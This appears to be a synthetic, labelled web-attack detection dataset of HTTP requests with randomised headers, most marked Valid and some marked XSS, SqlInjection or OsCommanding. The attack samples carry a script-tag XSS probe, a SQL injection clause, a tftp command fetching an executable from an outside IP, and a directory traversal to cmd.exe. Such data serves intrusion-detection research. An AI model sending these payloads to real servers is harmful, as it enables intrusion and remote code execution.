Accept-Charset: euc-cn;q=0.9
Accept-Encoding: identity;q=0.7, gzip, compress, compress;q=0.9, deflate;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 97.241.16.223
Cookie: h24wS6bhl=lldyE;elt=84144101;fnoal=r0t)(&(objectClass    =   eow*);nndWDrilcir=91518832
Cookie2: $Version="30"
Date: Fri, 01 Jul 05 02:45:18 GMT
ETag: "7qUe0qTK9bbpCI0h@s"
Expect: xeilyu=t8r8Bikn;huTb=yonIs
From: 7EAiyd@ttlgtqrt.st
If-Modified-Since: Sat, 12 Mar 05 05:13:44 UTC
If-Unmodified-Since: Sat, 11 Nov 06 03:25:45 CET
If-Match: *
If-None-Match: "SvDPwDfBUYR_GzLe"
If-Range: Sun, 06 Aug 06 14:53:55 UTC
Max-Forwards: 8105
Pragma: snwt=g5hj
Authorization: Digest opaque="eynl"
Range: 2-927066
Referer: http://lnnud.de/jme7ano5/ehsu3w/p1h9xa0e.exe
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (compatible; MSIE 1.7; Open BSD i386; u1r0)
UA-CPU: x86
UA-OS: Win9x
UA-Pixels: 1363x5832
Via: 0.7 29.246.99.140
Transfer-Encoding: eajeel
Upgrade: en1/5.2
Warning: 084 221.225.214.82 "apGeti6neO" 
X-Serial-Number: 9576766349708862183
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37467
Start - Id: 46562
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.1
Host: 120.51.5.188
Connection: incsI
Accept: */*
Accept-Charset: windows-1251;q=0.6
Accept-Encoding: 
Accept-Language: dEvn44n9-omwchvgn;q=0.2, S8c-o8Eoi2, w-zdgsnbn
Cache-Control: max-stale
Client-ip: 132.35.207.18
Cookie: pam7GO=smhhderynb7n;@linknaZE7O_=iacdjrtoThsbsg;AsesoL=186443;n2atdhadaet=usef%bryNCe-;uahEa=36459005;caeeV6mna9lei=rzelego'7<z
Cookie2: $Version="190"
Date: Mon, 19 Jan 04 01:36:22 UTC
ETag: W/"BufY_5FWwPf3rOS6xC"
Expect: seturnT=oaeb;IrmjE
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 06 May 07 11:16:13 UTC
If-Unmodified-Since: Sat, 30 Jun 07 15:27:46 UTC
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "mJg7sXMekWv1O_5P_e1K"
If-Range: Thu, 05 Jul 07 03:58:18 UTC
Max-Forwards: 743
MIME-Version: 4.8
Pragma: ajyeoi0C=iod
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest response="Bf1A17Db765F8d2b90ad86d1D0Ca6f27"
Range: 910-120,749-15173
Referer: /6tt9ztoc/Sancr/ien7rhyt.cgi
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 2.2; fe-na; rv:6.6.8) Gecko/44387296
UA-CPU: x86
UA-Disp: 161,932,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 309x668
Via: 6.9 www.hnWvut.htm
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 136.226.21.172
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46562
Start - Id: 29145
class: Valid
GET /IRsuA2accept0QmV1.jpg?cNn=5044500&ittsdiljserb=085156&m@P66W._rOB=aat02yhrba3Uhll&n2seie4itEenct=ttnotiudOntwgneg&rh=afs&oS=dD4ci1Wav&nslA0q6ieIilCsm=429&wteeitwxethrhm=q5oza&ollirhsaOrnae9=6wh&8tueyseAdnch9Ot=mr&eaeabenoeryIjt=%3Ax&akhhg4s=58&it=La%27Ewr%2F+hnc1drsZf%2F HTTP/1.0
Host: 100.250.92.177
Connection: cXSbeefw
Accept: image/gif;q=0.3
Accept-Charset: utf-8, utf-8, x-mac-cyrillic;q=0.3, iso-2022-kr
Accept-Encoding: compress;q=0.5
Accept-Language: Od-Mneph;q=0.4, hoAXucu-ooaedra
Cache-Control: no-cache
Client-ip: 155.217.178.62
Cookie: 4mkrweoouent=3058176;a2cayyx=5628277537;akzlOcnIme8adi=eru
Cookie2: $Version="4"
Date: Fri, 05 Dec 08 23:37:22 CET
ETag: W/"XEtVNVRh.y@ToXJKLx"
Expect: 100-continue
From: espn@htNyusgoaB.com
If-Modified-Since: Sun, 22 Nov 09 11:31:21 GMT
If-Unmodified-Since: Mon, 21 Apr 08 07:39:59 UTC
If-Match: *
If-None-Match: "pZaXq81qHLnpUvenK"
If-Range: "jC2HAdGS5UC7gulXF"
Max-Forwards: 901
MIME-Version: 6.1
Pragma: oe0m=8getsl
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: Digest username="erud"
Range: 16-2105,040491-6,551014-
Referer: http://www.hneeei.cz/tfstc/zrOt/1lio/eEtmB/eirbais.mpg
TE: trailers
Trailer: User-Agent
User-Agent: hin4lzJt/3.0.1
UA-CPU: PowerPC
UA-Disp: 758,7778,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 466x304
Via: 5.4 www.rwioi.jpeg, FTP/5.4 www.ak3QR.css, HTTP/3.8 223.115.50.71
Transfer-Encoding: compress
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 97.58.176.102
X-Serial-Number: 1881707
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29145
Start - Id: 41948
class: SqlInjection
GET /4Fwme3M_fL6_C/tWsqbVouDZ5Rq5/1%u8DHYcati_5Re.pl?aclsg5nqcA=96689+++++or+++id%3E1+++or+++ls_id%3C67&opens4kW=woEiW1o8g2+&hlhx=y+texecc+Shue&Kcropoyhekswy=622&8yoIap5low8egb=nu%3EenetcataStF-hgEsimg+ou HTTP/1.0
Host: www.rbtbhv.net:80
Connection: close
Accept: audio/*
Accept-Charset: x-mac-roman;q=0.7
Accept-Encoding: deflate, deflate
Accept-Language: W-msRn, s-i, rs-yKshq6;q=0.6
Cache-Control: no-transform
Client-ip: 152.104.66.182
Cookie: oeftrraa=e7aa2;aei=lsnL;afa5iraNdeulnf=jjw9husP;KWOZPservicesZ=pT0F73FvQo;etrtAefgetieZta=091065
Cookie2: $Version="26"
Date: Mon, 22 Oct 07 15:34:34 GMT
ETag: W/"Xi2V.p7HT8fGoDYJZ39"
Expect: aeeedy
From: LtoaiMii@xdfo4enhse.be
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Sun, 03 Jan 10 23:00:03 CET
If-Match: *
If-None-Match: "5ZlG8oNFpAZ5Ob3hF"
If-Range: *
Max-Forwards: 1899
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: ltg0u zeLs=HjccvX
Range: 55660-
Referer: http://mruume.cz/1fadsein/sie2gJj/tuh3ht.gif
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ndKer7oe62ntglj
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: oaio4
Upgrade: imn/2.9
Warning: 021 www.mcyot.gif "hrtenvrrnpri" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 41242078999326437
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41948
Start - Id: 15471
class: Valid
GET /s9porO/eBrck0AdC4einr6Zdyh/n2Giktt/i5lCbDL@-ByPIy.sh?roRSoazdeekeHrs=85&osedmo=rO8o&D3xas=ddeguLste8i&tgbdXuevyii7=ct%2B&uf=01&1lsozmSg7nb=rrat+u&ydq4vit=241061401&nfsqs=kWJT HTTP/1.0
Host: www.lescXaedi5.uk
Connection: 6slIl
Accept: video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: b2S-h;q=0.6, tez-ohdi;q=0.9, sedion-Eee;q=0.1
Cache-Control: no-transform
Client-ip: 8.102.178.123
Cookie: fcUKainputC9i=4;hyode=s 
Cookie2: $Version="2"
Date: Wed, 26 Jul 06 14:00:26 CET
ETag: "GfcjBRnV1rnhFX.xaXW"
Expect: 100-continue
From: ob3Wdni@tbetshmkn.de
If-Modified-Since: Sun, 22 Jan 06 21:46:14 GMT
If-Unmodified-Since: Sun, 09 Nov 08 18:06:58 GMT
If-Match: *
If-None-Match: *
If-Range: "XNAupkkNJtEF9oLy1"
Max-Forwards: 36
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: zS7e stsaewg=oet2
Authorization: NTLM eWVzbGxlaXVlcmVlbXR0N2I2cmZHMm5kc2VlYk1yZmlzcm9n
Range: 14-
Referer: http://www.fPi7eye.org/uEsus2ol/TarIo/eRhya/rpnirUw.jpeg
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: Mozilla/6.5 (compatible; Konqueror/3.4; Solaris; WEahprnlde)
UA-CPU: Sparc
UA-Disp: 0411,934,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1725x7516
Via: FTP/5.8 www.rgvn.htm, 8.3 www.al9e.shtml, FTP/7.6 www.aadpnau.png
Transfer-Encoding: deflate
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 740 www.tindaC.shtml:1990 "frsnphme2n4i5tcrd" 
X-Forwarded-For: 10.6.38.7
X-Serial-Number: 83246160630295135066
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15471
Start - Id: 8365
class: Valid
GET /dGnzN/oHa/BPYhWrIvMC/f6Q5--6xqa2imYE.mdb?zm=479&lprSds4nElprn=sopen-aor8x9iv3m%3Fnrf1&nenlto2l2ntIi=1&php4iZ=156&ryeM=EeqCucleeansi&rnD1ergxrtcsn=lqnph-xi&eo=otlTecacsgdcbtg3&tthev=e&me9bmaF=rshdct HTTP/1.1
Host: www.4uhsas.ch
Connection: keep-alive
Accept: image/*, audio/x-wav, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.1
Accept-Language: c294r-e;q=0.0, awizG-yfeivll5, qtez2cr-eeczn6;q=0.9, t9ow-hnftor9;q=0.1
Cache-Control: only-if-cached
Client-ip: 205.125.184.207
Cookie: amwereaegojdw=rnfsOcE@Zw;cwtef37enldoi3=1Eifddt7rs0replacej;vdue3snmomeCHrn=ta;S2CpCAM6rexml=ameY;Rdhtsieuys=egoNoR
Cookie2: $Version="42"
Date: Tue, 26 Jan 10 23:43:05 CET
ETag: W/"qjBR@eXkBl4jAnqZz"
Expect: 100-continue
From: chtn@qt6hosna.org
If-Modified-Since: Sat, 08 Jan 05 12:48:13 UTC
If-Unmodified-Since: Sun, 14 Oct 07 10:42:46 UTC
If-Match: *
If-None-Match: "ExbLxyK_YMraGHGm"
If-Range: "xx8lqs--3-h1Ac4"
Max-Forwards: 562
MIME-Version: 5.6
Pragma: 4='Twe'
Proxy-Authorization: Digest qop=8rne
Authorization: Digest nc=EeAbbdBe
Range: -3949,19472-179474,-83888
Referer: /aeoqSyd.mdb
TE: trailers,gzip
Trailer: Upgrade
User-Agent: t5tRf5n http://www.hsgrx.be
UA-CPU: 68000
UA-Disp: 283,560,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6131x831
Via: 6.5 151.139.241.33
Transfer-Encoding: identity
Upgrade: e3tEtg/2.6, Ihes/0.9, eAmtdt/5.4, Tta/9.7, 0lnAm/3.4
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 482816
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8365
Start - Id: 33084
class: Valid
PUT /hA7/isPjtt9lMFCXd9H1Xv/AiyTi1iwTota/nfaNlA8eurLuiLdeel/xoaoctea2/dx.UrC7NMi.od/hNtem0ieLlolye8knlh/i-uAG.kHwu/mu86wA1pL/Ch@cZy@/trkGNe.dll? HTTP/1.0
Content-Length: 74
Content-Language: tels,adetjba
Content-Encoding: gzip
Content-Location: http://www.Oq8ed.gov/ne03glw/aamb/tetier/rrafes/oeeager.css
Content-MD5: dHJ4YXNEUnRyZTRyc2wwYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Sep 04 22:04:31 CET
Last-Modified: Thu, 18 Nov 04 16:47:57 GMT
Host: www.9Yre.ch:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: d-hprtd;q=0.5, 1hbieem-pnerleat;q=0.1
Cache-Control: min-fresh=617
Client-ip: 57.184.21.251
Cookie: 0yp=a;itcctawelhra=06;tuthtmrG=F~tv@/e;es1i=/savbscripts
Cookie2: $Version="16"
Date: Wed, 14 Sep 05 03:08:42 GMT
ETag: "nPkcfXQ0B-EnbWGoKHs"
Expect: lsstoeA
From: 4a64appe@alsxipenr.biz
If-Modified-Since: Fri, 18 Feb 05 15:05:46 GMT
If-Unmodified-Since: Fri, 27 Feb 04 04:23:59 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 May 04 23:07:22 GMT
Max-Forwards: 852
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM UnJpbmVoenVuZXdjc2VpYVIzc2FvNXhyMWFhYW1uZnpuZXNtZW1lbWU=
Authorization: NTLM cnNOcndqYXNyY29vaHR1aUFpa25hdW9yOWxpNWhvZUZyaGF1MWVudHJhbg==
Range: 25-158969,392635-882565,41-
Referer: http://fta3zR.net/lse0ge.php
TE: trailers
Trailer: TE
User-Agent: unsosrD/7.9.8.5.2
UA-CPU: 68000
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3560x1386
Via: 1.9 42.36.81.251:3, 5.4 220.20.41.116
Transfer-Encoding: gzip
Upgrade: w57/8.5, enyae/0.7
Warning: 039 18.32.213.153 "1himeenD6aarst" "Wed, 25 Aug 04 07:02:03 UTC"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1368641
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iRi5oenigPTr=rrseuaiitotgfnm0&klqh= r ha&rremb=911679&boot.inioYK4o=427896

End - Id: 33084
Start - Id: 27649
class: Valid
GET /ztsohseRef2ee/7yrdwcyftuheen/lndbceqnstg/1cukdsoilboaa4/iJ3ZHBm/i9Pbky/iaEite1ujelaaen/s33.dll?itin=4004&2llmrn=a+ HTTP/1.1
Host: 37.7.97.239
Connection: castem
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=37
Client-ip: 249.193.66.99
Cookie: rdNmeanNe=cojrde
Cookie2: $Version="435"
Date: Sun, 04 Jul 04 10:24:24 UTC
ETag: W/"ak0s7FBeXb2q82mcF-Dq"
Expect: oan7trl=EaeSe
From: Rofmod@oeornsCta.de
If-Modified-Since: Fri, 26 Mar 04 20:13:03 GMT
If-Unmodified-Since: Wed, 25 Apr 07 17:04:20 UTC
If-Match: "yzMC@BUJzYbQcdQ7V1"
If-None-Match: "6zv-wl-@LeXvq4Y2"
If-Range: *
Max-Forwards: 6460
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aWxkcjU0Ym1yY2xjZW1jb29oZThJZmtsY3RTdWlpZU04
Authorization: Basic Z2M3ZXI6cmlkSQ==
Range: 1580-,972119-044389
Referer: http://www.P7i99o.ch/ruwogh.png
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/6.0 (compatible; Konqueror/6.7; Open BSD i386; Rmfa; e95fiiy17)
UA-CPU: x86
UA-Disp: 788,8774,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0541x847
Via: FTP/9.6 28.40.116.181:687, 6.6 144.85.210.27
Transfer-Encoding: gzip
Upgrade: 1gb/9.9, brgs/8.9, on8tf3/1.0
Warning: 259 www.rfDsn.jpg "ohSzyAnhwspipbdtmo" "Tue, 28 Jun 05 14:35:35 GMT"
X-Forwarded-For: 21.17.8.118
X-Serial-Number: 7234717707
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 27649
Start - Id: 28828
class: Valid
GET /bDQM0EOxNIKO_thA/suihetGh3qiSsLhpal/rgjIrqtt8uET.r9.php3?pw_UIHCEJC0=autoexecm&luA=cLa7ZPQuFI HTTP/1.1
Host: 235.198.109.14
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.4, x-mac-turkish;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: e9mju9ab='ssknreid'
Client-ip: 52.119.70.73
Cookie: t5Y=083885;.rLsa=ditrcp;eanxUo=iesmrl(6cafN;R;6IoUg=85085;pugreyone=aPrdnHh0u;GrQwiL=3363620863
Cookie2: $Version="2"
Date: Tue, 24 Feb 09 10:37:06 UTC
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Tue, 02 Feb 10 09:21:06 GMT
If-Unmodified-Since: Sun, 20 May 07 05:46:29 UTC
If-Match: "R-k.yHvuCP5Ajlbyw"
If-None-Match: *
If-Range: "MBHz9mzTnZ602rjL6"
Max-Forwards: 3
MIME-Version: 9.9
Pragma: see='m'
Proxy-Authorization: hdae faMstat=0egsty
Authorization: e0ata8 dtcmu=gnr4iat
Range: -655480,928-436
Referer: /arQqe1ie.css
TE: chunked;q=0.7,gzip
Trailer: From
User-Agent: Mozilla/2.2 (Machintosh; U; PPC Mac OS X 2.5; la-sr; rv:4.9.4) Gecko/46461000
UA-CPU: 68000
UA-Disp: 550,6527,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 122x5513
Via: HTTP/6.3 www.7deihph.html:04
Transfer-Encoding: compress
Upgrade: cweSe/4.5, 2wd0e/5.6, Ttl/1.4
Warning: 614 www.wctyo.html "8eeedm5N" 
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28828
Start - Id: 30548
class: Valid
GET /eMDVL12NQ5nX/logkopen06vf-KVKhttpsv/eTma6G2fP1Xm/eFtleoe/hieu/6KnexecFFGBqu/ahoySbypcetsdn.tiff?h3ROYWYX7.p=5&zttiTs=txr HTTP/1.0
Host: 193.52.47.15:1
Connection: keep-alive
Accept: image/*, image/png, image/png;q=0.0
Accept-Charset: euc-kr
Accept-Encoding: deflate;q=0.7, deflate, compress;q=0.1
Accept-Language: rKte-ualr, z-6xxee1iu
Cache-Control: only-if-cached
Client-ip: 16.42.252.140
Cookie: rtioodrezq=selectP
Cookie2: $Version="017"
Date: Thu, 11 Jan 07 14:06:00 GMT
ETag: "@8CvfohAFcn7d-@5OH"
Expect: meez
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sun, 08 Aug 04 06:42:57 CET
If-Unmodified-Since: Mon, 01 Aug 05 08:29:55 GMT
If-Match: "hdSjgOj-KYj07QE"
If-None-Match: "oHAm8DCnkFcEkb_cihbk"
If-Range: Thu, 04 Dec 08 14:29:40 GMT
Max-Forwards: 313
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="4dDf5dd21A0133e5daCaF55eCeDfea5a"
Range: 369478-
Referer: /jnmA/13mesndr.php
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.3 (compatible; ennr; Win 9x; 2kntl; frkwEi3r; zooJa)
UA-CPU: 68000
UA-Disp: 9253,211,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5611x433
Via: HTTP/9.2 www.mC3gie.tiff, HTTP/6.6 98.191.145.158:08, 0.4 220.90.6.48
Transfer-Encoding: oLeidH
Upgrade: oro/8.8, a9o8/2.0, urC/3.4, 2oa/9.5, qDe/0.4
Warning: 671 140.154.212.102 "5oe5aeyToglnofojo" "Thu, 27 Mar 08 22:18:58 GMT"
X-Forwarded-For: 175.103.25.65
X-Serial-Number: 60141
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30548
Start - Id: 9680
class: Valid
GET /agMnWujhtacces2LMxterm/sgpvfnJFR_rX/oall/nZ2/@HSidRecho/4WNydf_tFDcXI/qefhunIItqvmsacn/ivcjAX4q/tedetdwr.asp?warttaneus=3969272&npdrmn7=413202&1A6exec=iionwfl&atTmo=199486&rt0anesibrhh=5858628574 HTTP/1.0
Host: 19.195.151.59
Connection: keep-alive
Accept: image/*, text/*;q=0.2, audio/basic;q=0.6
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: 1o-lrdooesh, i-fb8, coa-i, ihet6i1l-i4wy;q=0.4, oe-itpgai2;q=0.2
Cache-Control: min-fresh=4604
Client-ip: 6.215.182.6
Cookie: bkl0totVoz=udbhiMSemrtesdIc
Cookie2: $Version="770"
Date: Sun, 20 Jan 08 18:29:51 UTC
ETag: W/"0fKvY5bTDF@W2VXy8Rn"
Expect: 100-continue
From: iRorfGR@ESiu.st
If-Modified-Since: Tue, 13 Oct 09 01:50:48 CET
If-Unmodified-Since: Fri, 11 Aug 06 18:16:22 UTC
If-Match: "SISMK96_@4BA6KZ8"
If-None-Match: *
If-Range: "y27-4lzG.xwio.Gsx"
Max-Forwards: 82
MIME-Version: 6.8
Pragma: rLy=f7IoeO9r
Proxy-Authorization: NTLM bXk1bm1taGV0cmFtaGluMUlubmlxYnBic3l3OXVFdHVzeW50aXlpc29hdHllZUlt
Authorization: NTLM dDdua2V3dWVlaUh1ak9kaGdkc29lYmtvVHZvZTZzb2U=
Range: 7-
Referer: http://hihddi.fr/einxsH/sp8UdK/eAded.asmx
TE: gzip
Trailer: Date
User-Agent: Mozilla/9.7 (Windows; U; Win98 0.0; uo-ns; rv:3.2.5) Gecko/58206350
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 669x055
Via: FTP/0.4 247.19.110.9, 1.7 32.224.227.213
Transfer-Encoding: es5a
Upgrade: era/6.9
Warning: 505 www.ct8055li.htm:1418 "u4otFoe" "Sun, 14 Jun 09 04:48:25 UTC"
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 66630290652
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9680
Start - Id: 24233
class: Valid
GET /9QPGH7tn_ufhM.e8e/suh/zxeeneelib6etcee/7RAD8DS6.html? HTTP/1.1
Host: 47.101.18.130
Connection: keep-alive
Accept: video/mpeg, image/*;q=0.0, application/zip
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate, deflate, compress
Accept-Language: sci8fmae-w5lOs;q=0.2, o-n;q=0.8
Cache-Control: max-stale=75
Client-ip: 38.8.118.31
Cookie: update_exec_3iXj=r5:
Cookie2: $Version="00"
Date: Sat, 19 Jan 08 08:29:48 GMT
ETag: "36bzC1d_MvE69Aj.xtI"
Expect: 100-continue
From: s0hwns@eIpjfyve7i.ch
If-Modified-Since: Sun, 21 Jun 09 06:54:59 GMT
If-Unmodified-Since: Tue, 05 Apr 05 17:29:27 GMT
If-Match: "V-Qecc.MCICW9IQR2C"
If-None-Match: "@9-.hYgteXGd1AJOzC5"
If-Range: Mon, 03 Jul 06 02:51:47 GMT
Max-Forwards: 5
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="anyiee"
Range: -8088,1567-
Referer: http://www.apoiEwos.cz/7cvow/ed2rtyer/eiwey/ds7tsa4i.asp
TE: trailers
Trailer: If-None-Match
User-Agent: ri0e (rXqwH94; e-HMQCo; jiXNY8D1l)
UA-CPU: Sparc
UA-Disp: 565,7828,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 982x566
Via: 9.7 www.i2qli.jpeg:05080
Transfer-Encoding: identity
Upgrade: 0O9/0.3, eie/2.8, dasr/3.6
Warning: 335 157.183.177.154 "buOrqedamsso" "Thu, 14 Apr 05 06:20:30 GMT"
X-Forwarded-For: 190.104.194.11
X-Serial-Number: 58849092
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24233
Start - Id: 43260
class: OsCommanding
GET /o9lNUyjxgzwt4/nm/ii.xIke89IbO.Y5/h0y4teelnich.shtml?Eue=kt&Wli5nt6t1ueE=2&eEe=tb&4iajiV=tftp+-c+get+++++179.177.56.90%3A%2Fch%2Fenantane.exe+++%7C HTTP/1.1
Host: 184.3.166.142:80
Connection: nqe5
Accept: application/x-tar;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=41424
Client-ip: 159.80.63.170
Cookie: nzt0uBresnUi=nw
Cookie2: $Version="54"
Date: Sun, 15 Mar 09 09:05:07 CET
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Thu, 30 Apr 09 08:04:16 CET
If-Unmodified-Since: Fri, 30 Mar 07 08:17:39 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 08:08:24 UTC
Max-Forwards: 822
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: NTLM aWdlaUlid25PcGhlemNoZ2Vyd3RuU3dnOWhwc3UyU2lpcg==
Range: -640387
Referer: http://nrdeen7s.it/eRue/st4heeo.msf
TE: gzip,chunked,trailers
Trailer: Via
User-Agent: esorfDcyoenntupeEgn
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 3.5 147.116.170.65, oyk/3.9 18.43.240.207, 8.9 29.18.197.225
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43260
Start - Id: 43775
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.mpary.cz
Connection: keep-alive
Accept: image/png, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=8584
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="143"
Date: Sat, 16 Aug 08 03:56:23 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: ttM2ahme
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Fri, 13 Mar 09 02:04:58 CET
If-Unmodified-Since: Fri, 12 Aug 05 08:16:43 CET
If-Match: "TA5Ul3_kyVRwbqsEZBPT"
If-None-Match: *
If-Range: *
Max-Forwards: 6770
MIME-Version: 7.5
Pragma: h='1Rmnfst1'
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: http://sren.cz/xetk/ouioeY/tisesDl.conf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/1.7 (Machintosh; U; Mac OS X 0.2; ul-tt; rv:2.4.4) Gecko/61610988
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 834x118
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: compress
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43775
Start - Id: 21624
class: Valid
GET /fd/cRx.ADhq7UurS/oISp5rVHx@bCcyCs/aiopncpehnegonpd.jpg?en0oeMs=rnaazhsr5cjO&3a9ohoreeoO=iXex&dphEv4sa8iey=aagwshieS4&tndZ-FvJC=re0passthru%24a&O2ocizhz8Aw=%27ts+8sthgddo%3Eorso&ieoR=n.P&j2Pdivetc0q2bvZM=ilHpsupctln%5DFh&LfHaLBkm_9=rlk%3Bthaccept8%5C&ieamsetitwasel=tqo1nyusdawep&utne=2976287&bnirnnumPrdhW=rsesocVraa4rfsi6&d6snf=ady&nv_uNxOSmreplace=mxamkcf58y HTTP/1.1
Host: 113.226.224.123:0464
Connection: close
Accept: application/*, application/*, image/jpeg
Accept-Charset: windows-874, isiri-3342
Accept-Encoding: 
Accept-Language: e-6len1;q=0.8, odah-eS;q=0.2, Ssvscief-ngm;q=0.1, htde-f6uidvif
Cache-Control: no-transform
Client-ip: 160.240.96.171
Cookie: 3u5lixdRsmE3o=oHseeeo;ikisdrnh5oc=nrcp%apb'
